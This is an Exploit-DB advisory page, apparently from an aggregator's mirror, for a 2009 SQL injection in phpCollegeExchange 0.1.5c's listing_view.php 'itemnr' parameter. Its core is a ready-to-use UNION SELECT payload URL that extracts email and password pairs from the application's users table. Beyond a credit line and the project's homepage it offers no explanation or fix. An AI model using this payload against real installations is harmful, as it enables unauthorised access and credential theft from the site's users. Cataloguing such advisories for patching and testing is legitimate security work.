Lucene search

K
exploitdbSirGodEDB-ID:8962
HistoryJun 15, 2009 - 12:00 a.m.

PHPCollegeExchange 0.1.5c - 'listing_view.php?itemnr' SQL Injection

2009-06-1500:00:00
SirGod
www.exploit-db.com
23

AI Score

7.4

Confidence

Low

#################################################################################################################
[+] phpCollegeExchange 0.1.5c (listing_view.php itemnr) SQL Injection Vulnerability
[+] Discovered By SirGod 
[+] www.mortal-team.org
#################################################################################################################

[+] Script homepage : http://phpcollegeex.sourceforge.net/

[+] SQL Injection 

   http://127.0.0.1/[path]/house/listing_view.php?itemnr=null+union+all+select+1,2,3,concat(email,0x3a,0x3a,0x3a,password),5,6,7,8,9,10+from+users--

#################################################################################################################

# milw0rm.com [2009-06-15]

AI Score

7.4

Confidence

Low

Related for EDB-ID:8962